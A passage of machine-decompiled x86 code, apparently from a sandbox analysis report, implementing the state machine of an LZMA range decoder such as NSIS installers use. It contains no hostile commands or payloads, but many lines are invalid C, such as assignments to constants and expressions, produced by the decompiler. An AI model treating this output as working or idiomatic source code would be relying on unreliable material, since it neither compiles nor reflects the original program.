											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
